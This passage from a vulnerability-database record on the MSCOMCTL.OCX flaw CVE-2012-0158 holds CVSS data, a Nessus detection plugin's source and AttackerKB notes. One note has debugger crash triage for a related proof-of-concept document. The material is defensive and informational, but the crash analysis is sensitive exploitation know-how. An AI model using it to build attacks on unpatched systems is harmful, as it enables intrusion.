Execution: April 10, 2012", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-05-23T21:51:36", "id": "KB2664258", "href": "https://support.microsoft.com/en-us/help/2664258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:23:04", 
"description": "A memory corruption issue exists in Windows common controls, specifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2, MSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of MSCOMCTL.OCX, due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this issue by convincing a user to view a specially crafted web page, resulting in the execution of arbitrary code.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:microsoft:office", "cpe:/a:microsoft:office_web_components", "cpe:/a:microsoft:sql_server", "cpe:/a:microsoft:visual_basic", "cpe:/a:microsoft:visual_foxpro", "cpe:/a:microsoft:biztalk_server", "cpe:/a:microsoft:commerce_server"], "id": "SMB_NT_MS12-027.NASL", "href": "https://www.tenable.com/plugins/nessus/58659", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58659);\n script_version(\"1.38\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-0158\");\n script_bugtraq_id(52911);\n script_xref(name:\"EDB-ID\", value:\"18780\");\n script_xref(name:\"MSFT\", value:\"MS12-027\");\n 
script_xref(name:\"MSKB\", value:\"983807\");\n script_xref(name:\"MSKB\", value:\"983808\");\n script_xref(name:\"MSKB\", value:\"983809\");\n script_xref(name:\"MSKB\", value:\"2597112\");\n script_xref(name:\"MSKB\", value:\"2598039\");\n script_xref(name:\"MSKB\", value:\"2598041\");\n script_xref(name:\"MSKB\", value:\"2641426\");\n script_xref(name:\"MSKB\", value:\"2645025\");\n script_xref(name:\"MSKB\", value:\"2647488\");\n script_xref(name:\"MSKB\", value:\"2647490\");\n script_xref(name:\"MSKB\", value:\"2655547\");\n script_xref(name:\"MSKB\", value:\"2658674\");\n script_xref(name:\"MSKB\", value:\"2658676\");\n script_xref(name:\"MSKB\", value:\"2658677\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A memory corruption issue exists in Windows common controls,\nspecifically within the MSCOMCTL.TreeView, MSCOMCTL.ListView2,\nMSCOMCTL.TreeView2, and MSCOMCTL.ListView controls component of\nMSCOMCTL.OCX, due to improper sanitization of user-supplied input. 
An\nunauthenticated, remote attacker can exploit this issue by convincing\na user to view a specially crafted web page, resulting in the\nexecution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-027\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office 2003, 2007 and\n2010; Office 2003 Web Components; SQL Server 2000, 2005, 2005 Express\nEdition, 2008, and 2008 R2; BizTalk Server 2002; Commerce Server 2002,\n2007, 2009, and 2009 R2; Microsoft Visual FoxPro 8.0 and 9.0; and\nVisual Basic 6.0 Runtime.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-027 MSCOMCTL ActiveX Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:microsoft:office\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office_web_components\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:sql_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_basic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:visual_foxpro\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:biztalk_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:commerce_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"mssql_version.nasl\", \"commerce_server_installed.nasl\", \"biztalk_server_installed.nasl\", \"foxpro_installed.nasl\", \"office_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_activex_func.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS12-027';\nkbs = make_list(\n '983807',\n '983808',\n '983809',\n '2597112',\n '2598039',\n '2598041',\n '2641426',\n '2645025',\n '2647488',\n '2647490',\n '2655547',\n '2658674',\n '2658676',\n '2658677'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Uninstall/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', 
exit_code:1);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, 'activex_init');\n\nclsids = make_list(\n '{bdd1f04b-858b-11d1-b16a-00c0f0283628}',\n '{996BF5E0-8044-4650-ADEB-0B013914E99C}',\n '{C74190B6-8589-11d1-B16A-00C0F0283628}',\n '{9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E}'\n);\n\nactivex_report = NULL;\nvuln = 0;\n\nforeach clsid (clsids)\n{\n # Make sure the control is installed\n file = activex_get_filename(clsid:clsid);\n if (isnull(file) || !file) continue;\n\n # Get its version\n version = activex_get_fileversion(clsid:clsid);\n if (!version) version = 'unknown';\n\n if ((version != 'unknown' && ver_compare(ver:version, fix:'6.1.98.33') < 0) && activex_get_killbit(clsid:clsid) == 0)\n {\n vuln++;\n if (!isnull(activex_report)) activex_report += '\\n';\n activex_report +=\n '\\n Class identifier : ' + clsid +\n '\\n Filename : ' + file +\n '\\n Installed version : ' + version;\n }\n}\n\nactivex_end();\n\nanalysis_svcs_installed = !isnull(get_kb_item('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/Microsoft SQL Server 2000 Analysis Services/DisplayName'));\nsql_ver_list = get_kb_list(\"mssql/installs/*/SQLVersion\");\nanalysispath = NULL;\nvfp8_installed = !isnull(get_kb_item('SMB/VFP8.0/path'));\nvfp9_installed = !isnull(get_kb_item('SMB/VFP9.0/path'));\ncommerce_edition = get_kb_item('SMB/commerce_server/productname');\nvb6_installed = FALSE;\noffice_version = hotfix_check_office_version();\nowc2003_installed = FALSE;\n\nbiztalk_editions = make_list();\nbiztalk_installs = get_installs(app_name:\"BizTalk Server\");\nif (!empty_or_null(biztalk_installs[1]))\n{\n foreach biztalk_install (biztalk_installs[1])\n biztalk_editions = make_list(biztalk_editions, biztalk_install['Product Name']);\n}\n\nuninst_array = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nforeach item (keys(uninst_array))\n{\n name = uninst_array[item];\n\n if (name == 'Microsoft Office 2003 Web 
Components')\n {\n # determine if this is an 11.x or a 12.x\n ver_key = item - \"DisplayName\";\n ver_key += \"DisplayVersion\";\n owc_ver = get_kb_item_or_exit(ver_key);\n\n if (\n # OWC 2003 SP3 (11.0.8173.0)\n owc_ver =~ \"^11\\.\" &&\n ver_compare(ver:owc_ver, fix:'11.0.8173.0', strict:FALSE) >= 0\n )\n owc2003_installed = TRUE;\n else if (\n # OWC 2003 for 2007 SP2 (12.0.6425.1000)\n # OWC 2003 for 2007 SP3 (12.0.6607.1000); note this\n # branch is vuln and there's no need for an upper\n # boundary until (and if) an SP4 is released.\n owc_ver =~ \"^12\\.\" &&\n ver_compare(ver:owc_ver, fix:'12.0.6425.1000', strict:FALSE) >= 0\n )\n owc2003_for_office2007_installed = TRUE;\n\n break;\n }\n}\n\nif (vuln > 0 || analysis_svcs_installed)\n{\n registry_init();\n hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\n # If the ActiveX stuff looks unpatched, try to determine which KBs are missing\n if (vuln > 0)\n {\n if (!isnull(get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Setup\\Microsoft Visual Basic\\ProductDir\")))\n vb6_installed = TRUE;\n }\n\n # determine if 32 or 64-bit office is installed. 
this value is reportedly whenever office 2010 is installed, even if outlook is not installed\n if (office_version['14.0'])\n office_bitness = get_registry_value(handle:hklm, item:\"Software\\Microsoft\\Office\\14.0\\Outlook\\Bitness\");\n\n # get the SQL Server 200 Analysis Services path if it looks like it's installed\n if (analysis_svcs_installed)\n {\n analysispath = get_registry_value(handle:hklm, item:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL Server 2000 Analysis Services\\InstallLocation\");\n\n if (analysispath)\n analysispath += \"\\bin\";\n }\n\n RegCloseKey(handle:hklm);\n close_registry();\n}\n\nprod_info = NULL;\n\nif (vuln)\n{\n activex_report = 'The following vulnerable controls do not have the kill bit set :\\n' + activex_report;\n prod_info = NULL;\n\n if (office_version['11.0'] || owc2003_installed)\n {\n flag = TRUE;\n if (office_version['11.0'])\n {\n sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (!isnull(sp) && sp < 3) flag = FALSE; # < SP3 not reported\n }\n\n if (flag)\n {\n # KB923618 is Office 2003 SP3. KB2597112 will fail to install unless it's present, though it\n # doesn't make it clear that the failure is due to a lack of SP3\n prod_info +=\n '\\n\\nProduct : Office 2003 / Office 2003 Web components' +\n '\\nMissing update : KB2597112 (prerequisite: KB923618)';\n hotfix_add_report(bulletin:bulletin, kb:'2597112');\n }\n }\n if (office_version['12.0'] || owc2003_for_office2007_installed)\n {\n # If Office 2003 Web Components is ver. 
12.x a different KB applies\n prod_info +=\n '\\n\\nProduct : Office 2007 / Office 2003 Web Components' +\n '\\nMissing update : KB2598041 (prerequisite: KB937961)';\n hotfix_add_report(bulletin:bulletin, kb:'2598041');\n }\n if (office_version['14.0'] && office_bitness != 'x64')\n {\n prod_info +=\n '\\n\\nProduct : Office 2010' +\n '\\nMissing update : KB2598039';\n hotfix_add_report(bulletin:bulletin, kb:'2598039');\n }\n if (vfp8_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 8.0' +\n '\\nMissing update : KB2647488';\n hotfix_add_report(bulletin:bulletin, kb:'2647488');\n }\n if (vfp9_installed)\n {\n prod_info +=\n '\\n\\nProduct : Visual FoxPro 9.0' +\n '\\nMissing update : KB2647490';\n hotfix_add_report(bulletin:bulletin, kb:'2647490');\n }\n if (vb6_installed)\n {\n # KB290887 is VB 6.0 Runtime SP6\n prod_info +=\n '\\n\\nProduct : Visual Basic 6.0 Runtime' +\n '\\nMissing update : KB2641426 (prerequisite: KB290887)';\n hotfix_add_report(bulletin:bulletin, kb:'2641426');\n }\n if ('2009 R2' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009 R2' +\n '\\nMissing update : KB2658676';\n hotfix_add_report(bulletin:bulletin, kb:'2658676');\n }\n else if ('2009' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2009' +\n '\\nMissing update : KB2655547';\n hotfix_add_report(bulletin:bulletin, kb:'2655547');\n }\n if ('2007' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2007' +\n '\\nMissing update : KB2658677';\n hotfix_add_report(bulletin:bulletin, kb:'2658677');\n }\n if ('2002' >< commerce_edition)\n {\n prod_info +=\n '\\n\\nProduct : Commerce Server 2002' +\n '\\nMissing update : KB2658674';\n hotfix_add_report(bulletin:bulletin, kb:'2658674');\n }\n if (max_index(biztalk_editions) > 0)\n {\n foreach biztalk_edition (biztalk_editions)\n {\n if ('2002' >< biztalk_edition)\n {\n prod_info +=\n '\\n\\nProduct : BizTalk Server 2002' +\n '\\nMissing update : 
KB2645025';\n hotfix_add_report(bulletin:bulletin, kb:'2645025');\n }\n }\n }\n}\n\n# the only other things to check are sql server 2000 and sql server 2000 analysis services.\n# if neither are installed and the activex stuff is not vulnerable, there's no need to do any further testing\nif (vuln == 0 && isnull(analysispath) && isnull(sql_ver_list)) exit(0, 'The host is not affected.');\n\nif (!is_accessible_share()) exit(1, 'is_accessible_share() failed.');\n\n# SQL Server 2000 Analysis Services\nif (\n analysispath &&\n hotfix_is_vulnerable(path:analysispath, file:\"Msmdadin.dll\", version:\"8.0.0.2302\", min_version:\"8.0.0.0\", bulletin:bulletin, kb:\"983807\")\n)\n{\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000 Analysis Services' +\n '\\nMissing update : KB983807';\n }\n}\n\nforeach item (keys(sql_ver_list))\n{\n item -= 'mssql/installs/';\n item -= '/SQLVersion';\n sqlpath = item;\n\n share = hotfix_path2share(path:sqlpath);\n if (!is_accessible_share(share:share)) continue;\n\n # SQL Server 2000\n # GDR\n if (hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2065.0\", min_version:\"2000.80.2000.0\", bulletin:bulletin, kb:\"983808\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983808';\n }\n }\n # QFE\n else if(hotfix_is_vulnerable(path:sqlpath, file:\"Sqlservr.exe\", version:\"2000.80.2301.0\", min_version:\"2000.80.2100.0\", bulletin:bulletin, kb:\"983809\"))\n {\n vuln++;\n\n if (!isnull(activex_report))\n {\n prod_info +=\n '\\n\\nProduct : SQL Server 2000' +\n '\\nMissing update : KB983809';\n }\n }\n}\n\nif (vuln)\n{\n if (isnull(prod_info)) exit(0, \"None of the Microsoft KBs applies even though at least one of the controls is in use, possibly from a third-party application.\");\n\n if (!isnull(activex_report))\n {\n activex_report +=\n '\\n\\nNessus determined these controls are being used by 
the following applications :' +\n prod_info;\n\n if (hotfix_get_report())\n hotfix_add_report('\\n' + activex_report, bulletin:bulletin);\n else\n hotfix_add_report(activex_report, bulletin:bulletin);\n }\n\n set_kb_item(name:'SMB/Missing/' + bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-12-16T17:55:49", "description": "The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or \u00a9 .rtf file that triggers \u201csystem state\u201d corruption, as exploited in the wild in April 2012, aka \u201cMSCOMCTL.OCX RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:46pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 \n\n * Associated Malware: Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security 
patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\n**dmelcher5151** at April 15, 2020 4:17pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 \n\n * Associated Malware: Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\nAssessed Attacker Value: 5\n", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2012-0158", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2021-07-27T00:00:00", "id": "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "href": "https://attackerkb.com/topics/WPlLOOTkVi/cve-2012-0158", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-07T23:07:13", "description": "The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka \u201cMSCOMCTL.OCX RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nTo trigger this:\n\n 1. Open the poc with Microsoft Word 2003 \n\n 2. Close Microsoft Word, that\u2019s when the crash is triggered. \n\n \n \n 0:000> r\n eax=056ef534 ebx=00000000 ecx=00000000 edx=02ac0007 esi=0571c18c edi=00000000\n eip=2758fce3 esp=0012e348 ebp=0012e3f4 iopl=0 nv up ei pl nz ac po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:00000008=????????\n 0:000> k\n ChildEBP RetAddr\n WARNING: Stack unwind information not available. 
Following frames may be wrong.\n 0012e3f4 650cd2e2 MSCOMCTL!DllGetClassObject+0x8f9f\n 0012e40c 650cd052 VBE6!rtcSendKeys+0x1d442\n 00000000 00000000 VBE6!rtcSendKeys+0x1d1b2\n \n MSCOMCTL!DllGetClassObject+0x8f91:\n 2758fcd5 57 push edi\n 2758fcd6 8b7828 mov edi,dword ptr [eax+28h]\n 2758fcd9 8b481c mov ecx,dword ptr [eax+1Ch]\n 2758fcdc 895848 mov dword ptr [eax+48h],ebx\n 2758fcdf 83c01c add eax,1Ch\n 2758fce2 50 push eax\n 2758fce3 ff5108 call dword ptr [ecx+8]\n \n 0:000> dc eax\n 056faeb4 00000000 00000000 00000000 00000000 ................\n 056faec4 31005c00 00000000 693f3800 44001029 .\\.1.....8?i)..D\n 056faed4 4d55434f 00317e45 03004400 00000000 OCUME~1..D......\n 056faee4 3c3f37be eb4118bd 000014a6 6f004400 .7?<..A......D.o\n 056faef4 75006300 65006d00 74006e00 20007300 .c.u.m.e.n.t.s.\n 056faf04 6e006100 20006400 65005300 74007400 .a.n.d. .S.e.t.t\n 056faf14 6e006900 73006700 18000000 00000000 .i.n.g.s........\n 056faf24 00000000 00130010 010c017a 0018e920 ........z... ...\n \n\nNote: \nThis crash is different than CVE-2012-0158, despite the fact they both target the same component. \nCVE-0158 is due to a memcpy call, and then retn to the user-controlled stack. However, this PoC \nleverages from a CALL [ECX+8] call.\n\n * Using samples provided by nex \n\n\n071cb2398e5b6ad9e965c4191443227166861129eb4aca6fc1fc647b85eb91d6\n\nOffice 2003 crash:\n \n \n 0:004> sxe ld mscomctl\n 0:004> g\n ModLoad: 27580000 27685000 C:\\WINDOWS\\system32\\MSCOMCTL.OCX\n eax=00000000 ebx=00000000 ecx=02bd0000 edx=7c90e4f4 esi=00000000 edi=00000000\n eip=7c90e4f4 esp=0011fe58 ebp=0011ff4c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n ntdll!KiFastSystemCallRet:\n 7c90e4f4 c3 ret\n 0:000> u 2758fce3\n *** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\WINDOWS\\system32\\MSCOMCTL.OCX -\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8]\n 2758fce6 3bfb cmp edi,ebx\n 2758fce8 8bc7 mov eax,edi\n 2758fcea 75ea jne MSCOMCTL!DllGetClassObject+0x8f92 (2758fcd6)\n 2758fcec 5f pop edi\n 2758fced ebd1 jmp MSCOMCTL!DllGetClassObject+0x8f7c (2758fcc0)\n 2758fcef 56 push esi\n 2758fcf0 57 push edi\n 0:000> bp 2758fce3\n 0:000> g\n Breakpoint 0 hit\n eax=01d028a4 ebx=00000000 ecx=2759e3e8 edx=fffffd37 esi=00211ca4 edi=00000000\n eip=2758fce3 esp=001213f8 ebp=00121434 iopl=0 nv up ei pl nz ac po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:2759e3f0=a0255827\n \n\nAnother crash, with interesting stack??\n \n \n 0:000> kb\n ChildEBP RetAddr Args to Child\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00125fb8 30e5982d 01ee0010 3144c8a5 01ee0070 mso!Ordinal2669+0x5f\n 00125fe0 31443f75 01ee0070 00010000 001260d0 mso!Ordinal2669+0x18\n 00126000 311a5a49 01ee0010 001260d0 012d0920 mso!Ordinal530+0x352\n 00126020 311a5f47 001260d0 01c0687c 012d075c mso!Ordinal2690+0x1ac\n 0012603c 306063d0 012d0920 001260d0 30161ba0 mso!Ordinal2690+0x6aa\n 00126058 30161a59 001260b0 00000000 00000000 WINWORD!wdCommandDispatch+0x1d695\n 0012608c 30609242 001260b0 000000d2 00a20394 WINWORD+0x161a59\n 001261b0 7c80ae80 30c90000 00000000 30c90000 WINWORD!wdCommandDispatch+0x20507\n 0012622c 7c80ae6e 00126254 7c80ae80 30c90000 kernel32!GetProcAddress+0x5b\n 00126254 00126244 30c90000 0012f904 30ed90c6 kernel32!GetProcAddress+0x43\n 0012626c 30e59897 30e5982d 00a20178 30e5979a 0x126244 <====\n 00126270 30e5982d 00a20178 30e5979a 00a353a4 mso!Ordinal2669+0x82\n 00126278 30e5979a 00a353a4 000000d8 300d9800 mso!Ordinal2669+0x18\n 00126294 3018c671 00000001 000000d8 000000c8 mso!Ordinal2402+0x13\n 001262ac 3060295c 00000000 00000003 00a20178 
WINWORD+0x18c671\n 001262d4 3060958f 30609596 00126308 00000000 WINWORD!wdCommandDispatch+0x19c21\n 00126338 304c7d41 01c05c78 00000001 00000000 WINWORD!wdCommandDispatch+0x20854\n 00126354 3003caf0 00000003 00000001 00000001 WINWORD+0x4c7d41\n 00000000 00000000 00000000 00000000 00000000 WINWORD+0x3caf0\n \n\nOffice 2007 crash\n \n \n Microsoft (R) Windows Debugger Version 6.2.8400.0 X86\n Copyright (c) Microsoft Corporation. All rights reserved.\n \n *** wait with pending attach\n Symbol search path is: *** Invalid ***\n ****************************************************************************\n * Symbol loading may be unreliable without a symbol search path. *\n * Use .symfix to have the debugger choose a symbol path. *\n * After setting your symbol path, use .reload to refresh symbol locations. *\n ****************************************************************************\n Executable search path is:\n ModLoad: 30000000 30057000 C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE\n ModLoad: 7c900000 7c9af000 C:\\WINDOWS\\system32\\ntdll.dll\n ModLoad: 7c800000 7c8f6000 C:\\WINDOWS\\system32\\kernel32.dll\n ModLoad: 78130000 781cb000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\\MSVCR80.dll\n ModLoad: 77c10000 77c68000 C:\\WINDOWS\\system32\\msvcrt.dll\n ModLoad: 31240000 322ec000 C:\\Program Files\\Microsoft Office\\Office12\\wwlib.dll\n ModLoad: 77dd0000 77e6b000 C:\\WINDOWS\\system32\\ADVAPI32.dll\n ModLoad: 77e70000 77f02000 C:\\WINDOWS\\system32\\RPCRT4.dll\n ModLoad: 77fe0000 77ff1000 C:\\WINDOWS\\system32\\Secur32.dll\n ModLoad: 77f10000 77f59000 C:\\WINDOWS\\system32\\GDI32.dll\n ModLoad: 7e410000 7e4a1000 C:\\WINDOWS\\system32\\USER32.dll\n ModLoad: 774e0000 7761d000 